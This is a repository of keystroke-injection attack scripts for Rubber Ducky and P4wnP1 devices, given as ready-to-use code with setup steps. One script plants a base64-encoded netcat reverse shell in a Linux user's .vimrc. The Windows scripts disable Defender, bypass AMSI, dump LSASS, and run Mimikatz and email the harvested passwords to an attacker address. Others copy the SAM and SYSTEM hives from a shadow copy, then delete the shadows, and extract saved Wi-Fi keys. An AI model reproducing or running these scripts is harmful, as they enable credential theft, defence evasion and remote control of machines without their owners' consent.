├── Backdoor
    └── Linux - VIM Config Netcat Backdoor.md
├── Credentials
    ├── Credentials - Dump LSASS Process.md
    ├── Credentials - Mimikatz + Send Result to Mail.md
    ├── Credentials - Steal SAM and System.md
    └── Credentials - WifiKeyGrabber.md
├── README.md
└── demo
    └── Credentials
        └── demo-lsass_dump.gif


/Backdoor/Linux - VIM Config Netcat Backdoor.md:
--------------------------------------------------------------------------------
 1 | # Linux - VIM Config Netcat Backdoor
 2 | 
 3 | ## Description
 4 | 
 5 | A simple backdoor that execute a base64 encoded netcat reverse shell embedd into a VIM Config file. Run VIM execute the reverse shell.
 6 | 
 7 | ## Requirement
 8 | 
 9 | 1. First note this script has been created and tested under Kali Linux 2021.2 as target.
10 | 2. I used a QWERTZ keyboard to do this ("ch" layout), so you may need to change that.
11 | 3. Take the netcat reverse shell of pentest monkey (or whatever) and encode it to base64 using <a href="https://www.base64encode.org/">this site</a>. Then replace the base64 string into the code. I used the netcat reverse shell bellow.
12 | ```bash
13 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
14 | ```
15 | 5. Start a netcat listener in you'r attacker box.
16 | ```bash
17 | nc -nvlp 1234
18 | ```
19 | 
20 | NOTE : I suggest to use the website to encode in base64, because trying to do it in zsh terminal on kali truncated the base64 in two line. But of course, you can do it by the way that you want since it work.
21 | 
22 | ## Code
23 | 
24 | ```bash
25 | layout("CH")
26 | typingSpeed(1, 2)
27 | press("CTRL ALT T")
28 | delay(1000)
29 | type("echo '!base64 -d <<< cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC4xLjEwMyAxMjM0ID4vdG1wL2Y= | sh' > ~/.vimrc")
30 | press("ENTER")
31 | delay(1000)
32 | type("exit")
33 | delay(1000)
34 | press("ALT F2")
35 | delay(1000)
36 | type("vim wootwoot")
37 | press("ENTER")
38 | ```
39 | 


--------------------------------------------------------------------------------
/Credentials/Credentials - Dump LSASS Process.md:
--------------------------------------------------------------------------------
 1 | # Credentials - Dump LSASS Process
 2 | 
 3 | ## Description
 4 | 
 5 | This script will download MiniDump, extract it, run it to dump LSASS process to "C:\\lsass.dmp" or where you want.
 6 | 
 7 | ## Requirement
 8 | 
 9 | 1. First note this script has been created and tested under Windows 11 Build 22000.
10 | 2. I used a QWERTZ keyboard to do this ("ch" layout), so you may need to change that.
11 | 
12 | ## DEMO
13 | 
14 | <img src="https://github.com/V0lk3n/HIDScripts/blob/main/demo/Credentials/demo-lsass_dump.gif"/>
15 | 
16 | ## Code
17 | 
18 | ```bash
19 | layout("ch")
20 | press("GUI r")
21 | delay(1000)
22 | type("windowsdefender:")
23 | press("ENTER")
24 | delay(1000)
25 | press("ENTER")
26 | delay(1000)
27 | press("TAB")
28 | press("TAB")
29 | press("TAB")
30 | press("TAB")
31 | press("ENTER")
32 | delay(1000)
33 | press("SPACE")
34 | delay(1000)
35 | press("LEFT")
36 | delay(1000)
37 | press("ENTER")
38 | delay(1000)
39 | press("GUI r")
40 | delay(200)
41 | type("powershell.exe start-process powershell -verb runas")
42 | press("ENTER")
43 | delay(1500)
44 | press("LEFT")
45 | press("ENTER")
46 | delay(1000)
47 | type("[Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)")
48 | press("ENTER")
49 | delay(1000)
50 | type("(New-Object System.Net.WebClient).DownloadFile('https://github.com/V0lk3n/OSEP-CheatSheet/releases/download/MiniDump/MiniDump.zip','C:\\MiniDump.zip')")
51 | press("ENTER")
52 | delay(1000)
53 | type("cd /")
54 | press("ENTER")
55 | delay(500)
56 | type("mkdir MiniDump")
57 | press("ENTER")
58 | delay(500)
59 | type("Expand-Archive -Path MiniDump.zip -DestinationPath C:\\MiniDump")
60 | press("ENTER")
61 | delay(1500)
62 | type("cd MiniDump")
63 | press("ENTER")
64 | delay(500)
65 | type(".\\MiniDump.exe")
66 | press("ENTER")
67 | delay(1000)
68 | type("C:\\lsass.dmp")
69 | press("ENTER")
70 | delay(1000)
71 | type("cd /")
72 | press("ENTER")
73 | type("rmdir MiniDump")
74 | press("ENTER")
75 | delay(1000)
76 | type("T")
77 | press("ENTER")
78 | delay(1000)
79 | type("del MiniDump.zip")
80 | press("ENTER")
81 | delay(500)
82 | type("exit")
83 | press("ENTER")
84 | delay(1000)
85 | press("SPACE")
86 | delay(1000)
87 | press("ALT F4")
88 | ```
89 | 


--------------------------------------------------------------------------------
/Credentials/Credentials - Mimikatz + Send Result to Mail.md:
--------------------------------------------------------------------------------
  1 | # Credentials - Mimikatz + Send Result to Mail
  2 | 
  3 | ## Description
  4 | 
  5 | This is a simple HIDScript that disable windows defender, run Mimikatz (logonPasswords) and save the result to log.
  6 | Then it send to your mail the log as attachment, delete Mimikatz and log files and finally re-enable windows defender.
  7 | 
  8 | ## Requirement
  9 | 
 10 | 1. First note this script has been created and tested under Windows 11 Build 22000.
 11 | 
 12 | 2. I used a QWERTZ keyboard to do this ("ch" layout), so you may need to change that.
 13 | 
 14 | 3. Change the sender e-mail/password and set the attacker email that will receive the mail with the Mimikatz log attached to.
 15 | 
 16 | 4. To deliver the mail, you need first to allow less secure app to access you'r Gmail account. To do this you need first to disable 2FA, then enable less secure app (<a href="https://myaccount.google.com/lesssecureapps">direct link</a>). I suggest to create a Gmail account only for this purpose, instead of using you'r personal account if you are using Gmail. As you need to disable 2FA it expose you'r account.
 17 | 
 18 | ## Rubber/Pico Ducky Version
 19 | 
 20 | ```bash
 21 | GUI r
 22 | DELAY 1000
 23 | STRING windowsdefender:
 24 | ENTER
 25 | DELAY 1000
 26 | ENTER
 27 | DELAY 1000
 28 | TAB
 29 | TAB
 30 | TAB
 31 | TAB
 32 | ENTER
 33 | DELAY 1000
 34 | SPACE
 35 | DELAY 1000
 36 | LEFT
 37 | DELAY 1000
 38 | ENTER
 39 | DELAY 1000
 40 | GUI r
 41 | DELAY 1000
 42 | STRING powershell.exe start-process powershell -verb runas
 43 | ENTER
 44 | DELAY 1500
 45 | LEFT
 46 | ENTER
 47 | DELAY 1000
 48 | STRING [Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)
 49 | ENTER
 50 | DELAY 1000
 51 | STRING (New-Object System.Net.WebClient).DownloadFile('https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210810-2/mimikatz_trunk.zip','C:\\mimikatz_trunk.zip')
 52 | ENTER
 53 | DELAY 1000
 54 | STRING cd /
 55 | ENTER
 56 | DELAY 1000
 57 | STRING mkdir mimi
 58 | ENTER
 59 | DELAY 1000
 60 | STRING Expand-Archive -Path mimikatz_trunk.zip -DestinationPath C:\\mimi
 61 | ENTER
 62 | DELAY 1500
 63 | STRING cd mimi\\x64
 64 | ENTER
 65 | DELAY 1000
 66 | STRING .\\mimikatz.exe
 67 | ENTER
 68 | DELAY 1000
 69 | STRING log log.txt
 70 | ENTER
 71 | DELAY 1000
 72 | STRING privilege::debug
 73 | ENTER
 74 | DELAY 1000
 75 | STRING sekurlsa::logonPasswords
 76 | ENTER
 77 | DELAY 1000
 78 | STRING exit
 79 | ENTER
 80 | DELAY 1000
 81 | STRING $emailSmtpServer = 'smtp.gmail.com';$emailSmtpServerPort = '587';$emailSmtpUser = 'sender@gmail.com';$emailSmtpPass = 'YourSuperPassword';$emailMessage = New-Object System.Net.Mail.MailMessage;$emailMessage.From = 'HIDScript LogonPassword Mimikatz <sender@gmail.com>';$emailMessage.To.Add('attacker@protonmail.com');$emailMessage.Body = 'W00tW00t, You received one log file, see attachment!';$SMTPClient = New-Object System.Net.Mail.SmtpClient( $emailSmtpServer , $emailSmtpServerPort );$SMTPClient.EnableSsl = $true;$SMTPClient.Credentials = New-Object System.Net.NetworkCredential( $emailSmtpUser , $emailSmtpPass );$attachment = 'C:\\mimi\\x64\\log.txt';$emailMessage.Attachments.Add($attachment);$SMTPClient.Send($emailMessage)
 82 | ENTER
 83 | DELAY 2000
 84 | STRING cd /
 85 | ENTER
 86 | DELAY 200
 87 | STRING rmdir mimi
 88 | ENTER
 89 | DELAY 1000
 90 | STRING T
 91 | ENTER
 92 | DELAY 1000
 93 | STRING del mimikatz_trunk.zip
 94 | ENTER
 95 | DELAY 1000
 96 | STRING exit
 97 | ENTER
 98 | DELAY 1000
 99 | SPACE
100 | DELAY 1000
101 | ALT F4
102 | ```
103 | 
104 | ## P4wnP1 Version
105 | 
106 | ```bash
107 | layout("ch")
108 | press("GUI r")
109 | delay(1000)
110 | type("windowsdefender:")
111 | press("ENTER")
112 | delay(1000)
113 | press("ENTER")
114 | delay(1000)
115 | press("TAB")
116 | press("TAB")
117 | press("TAB")
118 | press("TAB")
119 | press("ENTER")
120 | delay(1000)
121 | press("SPACE")
122 | delay(1000)
123 | press("LEFT")
124 | delay(1000)
125 | press("ENTER")
126 | delay(1000)
127 | press("GUI r")
128 | delay(200)
129 | type("powershell.exe start-process powershell -verb runas")
130 | press("ENTER")
131 | delay(1500)
132 | press("LEFT")
133 | press("ENTER")
134 | delay(1000)
135 | type("[Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)")
136 | press("ENTER")
137 | delay(1000)
138 | type("(New-Object System.Net.WebClient).DownloadFile('https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210810-2/mimikatz_trunk.zip','C:\\mimikatz_trunk.zip')")
139 | press("ENTER")
140 | delay(1000)
141 | type("cd /")
142 | press("ENTER")
143 | delay(500)
144 | type("mkdir mimi")
145 | press("ENTER")
146 | delay(500)
147 | type("Expand-Archive -Path mimikatz_trunk.zip -DestinationPath C:\\mimi")
148 | press("ENTER")
149 | delay(1500)
150 | type("cd mimi")
151 | press("ENTER")
152 | delay(500)
153 | type("cd x64")
154 | press("ENTER")
155 | delay(500)
156 | type(".\\mimikatz.exe")
157 | press("ENTER")
158 | delay(1000)
159 | type("log log.txt")
160 | press("ENTER")
161 | delay(1000)
162 | type("privilege::debug")
163 | press("ENTER")
164 | delay(1000)
165 | type("sekurlsa::logonPasswords")
166 | press("ENTER")
167 | delay(1000)
168 | type("$emailSmtpServer = 'smtp.gmail.com';$emailSmtpServerPort = '587';$emailSmtpUser = 'sender@gmail.com';$emailSmtpPass = 'YourSuperPassword';$emailMessage = New-Object System.Net.Mail.MailMessage;$emailMessage.From = 'HIDScript LogonPassword Mimikatz <sender@gmail.com>';$emailMessage.To.Add('attacker@protonmail.com');$emailMessage.Body = 'W00tW00t, You received one log file, see attachment!';$SMTPClient = New-Object System.Net.Mail.SmtpClient( $emailSmtpServer , $emailSmtpServerPort );$SMTPClient.EnableSsl = $true;$SMTPClient.Credentials = New-Object System.Net.NetworkCredential( $emailSmtpUser , $emailSmtpPass );$attachment = 'C:\\mimi\\x64\\log.txt';$emailMessage.Attachments.Add($attachment);$SMTPClient.Send($emailMessage)")
169 | press("ENTER")
170 | delay(2000)
171 | type("cd /")
172 | press("ENTER")
173 | type("rmdir mimi")
174 | press("ENTER")
175 | delay(1000)
176 | type("T")
177 | press("ENTER")
178 | delay(1000)
179 | type("del mimikatz_trunk.zip")
180 | press("ENTER")
181 | delay(500)
182 | type("exit")
183 | press("ENTER")
184 | delay(1000)
185 | press("SPACE")
186 | delay(1000)
187 | press("ALT F4")
188 | 
189 | ```
190 | 


--------------------------------------------------------------------------------
/Credentials/Credentials - Steal SAM and System.md:
--------------------------------------------------------------------------------
 1 | # Credentials - Steal SAM and System
 2 | 
 3 | ## Description
 4 | 
 5 | This is a simple HIDScript that create a Shadow Volume Snapshot of C drive and copy SAM and SYSTEM files in you'r current directory.
 6 | 
 7 | ## Requirement
 8 | 
 9 | 1. First note this script has been created and tested under Windows 11 Build 22000.
10 | 2. I used a QWERTZ keyboard to do this ("ch" layout), so you may need to change that.
11 | 3. Change the "cd D:\\" command to your desired location where save the files. Basically it should be your rubber ducky device or whatever.
12 | 4. The shadow volume is set to "HarddiskVolumeShadowCopy1" based on the idea that the target computer hasn't created a Shadow Volume in the past. Otherwise, it can change to "HarddiskVolumeShadowCopy2" or whatever.
13 | 
14 | ## Code
15 | 
16 | ```bash
17 | layout("ch")
18 | press("GUI r")
19 | delay(200)
20 | type("powershell.exe start-process cmd -verb runas")
21 | press("ENTER")
22 | delay(1500)
23 | press("LEFT")
24 | press("ENTER")
25 | delay(1000)
26 | type("cd D:\\")
27 | type("wmic shadowcopy call create Volume='C:\\'")
28 | press("ENTER")
29 | delay(3000)
30 | type("copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\sam .")
31 | press("ENTER")
32 | delay(1000)
33 | type("copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\system .")
34 | press("ENTER")
35 | delay(1000)
36 | type("vssadmin delete shadows /All")
37 | press("ENTER")
38 | delay(500)
39 | type("O")
40 | press("ENTER")
41 | delay(2000)
42 | type("exit")
43 | press("ENTER")
44 | ```


--------------------------------------------------------------------------------
/Credentials/Credentials - WifiKeyGrabber.md:
--------------------------------------------------------------------------------
 1 | # Credentials - WiFiKeyGrabber
 2 | 
 3 | ## Description
 4 | 
 5 | WiFiKeyGrabber is a simple HIDScript that show in powershell output the saved Wi-Fi Passwords.
 6 | 
 7 | ## Requirement
 8 | 
 9 | 1. First note this script has been created and tested under Windows 11 Build 22000.
10 | 2. I used a QWERTZ keyboard to do this ("ch" layout), so you may need to change that.
11 | 
12 | ## Rubber/Pico Ducky Version
13 | 
14 | ```bash
15 | DEFAULT_DELAY 1000
16 | GUI r
17 | DELAY 200
18 | STRING powershell.exe -nop -exec bypass
19 | ENTER
20 | DELAY 200
21 | STRING netsh wlan export profile key=clear
22 | ENTER
23 | DELAY 200
24 | STRING Select-String -Path Wi-Fi*.xml -Pattern 'keyMaterial' | Select Filename, LineNumber, Line, Path | Format-Table
25 | ENTER
26 | DELAY 200
27 | STRING del Wi-Fi*.xml
28 | ENTER
29 | ```
30 | 
31 | ## P4wnP1 Version
32 | 
33 | ```bash
34 | layout("ch")
35 | press("GUI r")
36 | delay(200)
37 | type("powershell.exe -nop -exec bypass")
38 | press("ENTER")
39 | delay(1000)
40 | type("netsh wlan export profile key=clear")
41 | press("ENTER")
42 | type("Select-String -Path Wi-Fi*.xml -Pattern 'keyMaterial' | Select Filename, LineNumber, Line, Path | Format-Table")
43 | press("ENTER")
44 | type("del Wi-Fi*.xml")
45 | press("ENTER")
46 | ```
47 | 
48 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # HIDScripts
 2 | HIDScripts is my Collections of scripts i've created to be used with the Rubber Ducky/Pico Ducky and P4wnP1 A.L.O.A Project.
 3 | 
 4 | ## Credentials
 5 | 
 6 | * <a href="https://github.com/V0lk3n/HIDScripts/blob/main/Credentials/Credentials%20-%20Mimikatz%20%2B%20Send%20Result%20to%20Mail.md">Credentials - Mimikatz + Send Result to Mail</a>
 7 | * <a href="https://github.com/V0lk3n/HIDScripts/blob/main/Credentials/Credentials%20-%20WifiKeyGrabber.md">Credentials - WiFiKeyGrabber</a>
 8 | * <a href="https://github.com/V0lk3n/HIDScripts/blob/main/Credentials/Credentials%20-%20Steal%20SAM%20and%20System.md">Credentials - Steal SAM and SYSTEM</a>
 9 | * <a href="https://github.com/V0lk3n/HIDScripts/blob/main/Credentials/Credentials%20-%20Dump%20LSASS%20Process.md">Credentials - Dump LSASS Process</a>
10 | 
11 | ## Backdoor
12 | 
13 | * <a href="https://github.com/V0lk3n/HIDScripts/blob/main/Backdoor/Linux%20-%20VIM%20Config%20Netcat%20Backdoor.md">Linux - VIM Config Netcat Backdoor</a>
14 | 


--------------------------------------------------------------------------------
/demo/Credentials/demo-lsass_dump.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/V0lk3n/HIDScripts/3dccb70418ceebbf4126b25c16a636171e012a2c/demo/Credentials/demo-lsass_dump.gif


--------------------------------------------------------------------------------